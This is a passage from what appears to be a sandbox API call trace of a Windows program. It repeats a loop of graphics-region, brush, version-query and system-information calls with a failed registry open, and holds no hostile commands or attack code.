y2=0) returned 0x1045afc [0091.318] CombineRgn (hrgnDst=0x1045afb, hrgnSrc1=0x80401d9, hrgnSrc2=0x60401dc, iMode=1) returned 1 [0091.318] CombineRgn (hrgnDst=0x1045afc, hrgnSrc1=0x80401d9, hrgnSrc2=0x60401dc, iMode=4) returned 2 [0091.318] CreateSolidBrush (color=0xff) returned 0x2105afa [0091.318] CreateSolidBrush (color=0xff0000) returned 0x1105afd [0091.318] DeleteObject (ho=0x1105afd) returned 1 [0091.318] DeleteObject (ho=0x60401dc) returned 1 [0091.318] DeleteObject (ho=0x80401d9) returned 1 [0091.318] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.318] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.318] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.318] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.318] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.318] BeginPath (hdc=0x0) returned 0 [0091.318] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.318] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.318] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.318] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.318] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.318] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.318] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.318] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.318] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x70401dc [0091.319] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x90401d9 [0091.319] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045afe [0091.319] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aff [0091.319] CombineRgn (hrgnDst=0x1045afe, hrgnSrc1=0x70401dc, hrgnSrc2=0x90401d9, iMode=1) returned 1 [0091.319] CombineRgn (hrgnDst=0x1045aff, hrgnSrc1=0x70401dc, hrgnSrc2=0x90401d9, iMode=4) returned 2 [0091.319] CreateSolidBrush (color=0xff) returned 0x2105afd [0091.319] CreateSolidBrush (color=0xff0000) returned 0x1105b00 [0091.319] DeleteObject (ho=0x1105b00) returned 1 [0091.319] DeleteObject (ho=0x90401d9) returned 1 [0091.319] DeleteObject (ho=0x70401dc) returned 1 [0091.319] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.319] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.319] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.319] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.319] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.319] BeginPath (hdc=0x0) returned 0 [0091.319] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.319] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.319] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.319] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.319] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.319] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.319] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.319] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.319] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa0401d9 [0091.319] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x80401dc [0091.319] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b01 [0091.320] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b02 [0091.320] CombineRgn (hrgnDst=0x1045b01, hrgnSrc1=0xa0401d9, hrgnSrc2=0x80401dc, iMode=1) returned 1 [0091.320] CombineRgn (hrgnDst=0x1045b02, hrgnSrc1=0xa0401d9, hrgnSrc2=0x80401dc, iMode=4) returned 2 [0091.320] CreateSolidBrush (color=0xff) returned 0x2105b00 [0091.320] CreateSolidBrush (color=0xff0000) returned 0x1105b03 [0091.320] DeleteObject (ho=0x1105b03) returned 1 [0091.320] DeleteObject (ho=0x80401dc) returned 1 [0091.320] DeleteObject (ho=0xa0401d9) returned 1 [0091.320] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.320] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.320] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.320] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.320] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.320] BeginPath (hdc=0x0) returned 0 [0091.320] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.320] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.320] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.320] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.320] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.320] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.320] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.320] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.320] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90401dc [0091.320] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb0401d9 [0091.320] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b04 [0091.320] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b05 [0091.320] CombineRgn (hrgnDst=0x1045b04, hrgnSrc1=0x90401dc, hrgnSrc2=0xb0401d9, iMode=1) returned 1 [0091.320] CombineRgn (hrgnDst=0x1045b05, hrgnSrc1=0x90401dc, hrgnSrc2=0xb0401d9, iMode=4) returned 2 [0091.321] CreateSolidBrush (color=0xff) returned 0x2105b03 [0091.321] CreateSolidBrush (color=0xff0000) returned 0x1105b06 [0091.321] DeleteObject (ho=0x1105b06) returned 1 [0091.321] DeleteObject (ho=0xb0401d9) returned 1 [0091.321] DeleteObject (ho=0x90401dc) returned 1 [0091.321] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.321] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.321] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.321] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.321] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.321] BeginPath (hdc=0x0) returned 0 [0091.321] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.321] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.321] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.321] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.321] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.321] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.321] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.321] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.321] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc0401d9 [0091.321] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa0401dc [0091.321] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b07 [0091.321] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b08 [0091.321] CombineRgn (hrgnDst=0x1045b07, hrgnSrc1=0xc0401d9, hrgnSrc2=0xa0401dc, iMode=1) returned 1 [0091.321] CombineRgn (hrgnDst=0x1045b08, hrgnSrc1=0xc0401d9, hrgnSrc2=0xa0401dc, iMode=4) returned 2 [0091.321] CreateSolidBrush (color=0xff) returned 0x2105b06 [0091.321] CreateSolidBrush (color=0xff0000) returned 0x1105b09 [0091.321] DeleteObject (ho=0x1105b09) returned 1 [0091.322] DeleteObject (ho=0xa0401dc) returned 1 [0091.322] DeleteObject (ho=0xc0401d9) returned 1 [0091.322] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.322] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.322] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.322] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.322] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.322] BeginPath (hdc=0x0) returned 0 [0091.322] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.322] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.322] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.322] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.322] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.322] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.322] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.322] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.322] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb0401dc [0091.322] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd0401d9 [0091.322] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b0a [0091.322] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b0b [0091.322] CombineRgn (hrgnDst=0x1045b0a, hrgnSrc1=0xb0401dc, hrgnSrc2=0xd0401d9, iMode=1) returned 1 [0091.322] CombineRgn (hrgnDst=0x1045b0b, hrgnSrc1=0xb0401dc, hrgnSrc2=0xd0401d9, iMode=4) returned 2 [0091.322] CreateSolidBrush (color=0xff) returned 0x2105b09 [0091.322] CreateSolidBrush (color=0xff0000) returned 0x1105b0c [0091.322] DeleteObject (ho=0x1105b0c) returned 1 [0091.322] DeleteObject (ho=0xd0401d9) returned 1 [0091.322] DeleteObject (ho=0xb0401dc) returned 1 [0091.322] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.322] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.323] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.323] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.323] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.323] BeginPath (hdc=0x0) returned 0 [0091.323] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.323] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.323] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.323] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.323] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.323] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.323] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.323] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.323] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe0401d9 [0091.323] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc0401dc [0091.323] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b0d [0091.323] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b0e [0091.323] CombineRgn (hrgnDst=0x1045b0d, hrgnSrc1=0xe0401d9, hrgnSrc2=0xc0401dc, iMode=1) returned 1 [0091.323] CombineRgn (hrgnDst=0x1045b0e, hrgnSrc1=0xe0401d9, hrgnSrc2=0xc0401dc, iMode=4) returned 2 [0091.323] CreateSolidBrush (color=0xff) returned 0x2105b0c [0091.323] CreateSolidBrush (color=0xff0000) returned 0x1105b0f [0091.323] DeleteObject (ho=0x1105b0f) returned 1 [0091.323] DeleteObject (ho=0xc0401dc) returned 1 [0091.323] DeleteObject (ho=0xe0401d9) returned 1 [0091.323] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.323] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.323] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.323] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.324] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.324] BeginPath (hdc=0x0) returned 0 [0091.324] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.324] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.324] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.324] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.324] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.324] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.324] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.324] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.324] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd0401dc [0091.324] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf0401d9 [0091.324] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b10 [0091.324] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b11 [0091.324] CombineRgn (hrgnDst=0x1045b10, hrgnSrc1=0xd0401dc, hrgnSrc2=0xf0401d9, iMode=1) returned 1 [0091.324] CombineRgn (hrgnDst=0x1045b11, hrgnSrc1=0xd0401dc, hrgnSrc2=0xf0401d9, iMode=4) returned 2 [0091.324] CreateSolidBrush (color=0xff) returned 0x2105b0f [0091.324] CreateSolidBrush (color=0xff0000) returned 0x1105b12 [0091.324] DeleteObject (ho=0x1105b12) returned 1 [0091.324] DeleteObject (ho=0xf0401d9) returned 1 [0091.324] DeleteObject (ho=0xd0401dc) returned 1 [0091.324] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.324] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.324] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.324] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.324] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.324] BeginPath (hdc=0x0) returned 0 [0091.324] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.324] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.324] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.324] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.325] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.325] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.325] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.325] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x100401d9 [0091.325] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe0401dc [0091.325] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b13 [0091.325] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b14 [0091.325] CombineRgn (hrgnDst=0x1045b13, hrgnSrc1=0x100401d9, hrgnSrc2=0xe0401dc, iMode=1) returned 1 [0091.325] CombineRgn (hrgnDst=0x1045b14, hrgnSrc1=0x100401d9, hrgnSrc2=0xe0401dc, iMode=4) returned 2 [0091.325] CreateSolidBrush (color=0xff) returned 0x2105b12 [0091.325] CreateSolidBrush (color=0xff0000) returned 0x1105b15 [0091.325] DeleteObject (ho=0x1105b15) returned 1 [0091.325] DeleteObject (ho=0xe0401dc) returned 1 [0091.325] DeleteObject (ho=0x100401d9) returned 1 [0091.325] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.325] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.325] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.325] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.325] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.325] BeginPath (hdc=0x0) returned 0 [0091.325] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.325] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.325] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.325] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.325] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.325] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.325] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.326] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.326] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf0401dc [0091.326] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x110401d9 [0091.326] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b16 [0091.326] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b17 [0091.326] CombineRgn (hrgnDst=0x1045b16, hrgnSrc1=0xf0401dc, hrgnSrc2=0x110401d9, iMode=1) returned 1 [0091.326] CombineRgn (hrgnDst=0x1045b17, hrgnSrc1=0xf0401dc, hrgnSrc2=0x110401d9, iMode=4) returned 2 [0091.326] CreateSolidBrush (color=0xff) returned 0x2105b15 [0091.326] CreateSolidBrush (color=0xff0000) returned 0x1105b18 [0091.326] DeleteObject (ho=0x1105b18) returned 1 [0091.326] DeleteObject (ho=0x110401d9) returned 1 [0091.326] DeleteObject (ho=0xf0401dc) returned 1 [0091.326] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.326] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: 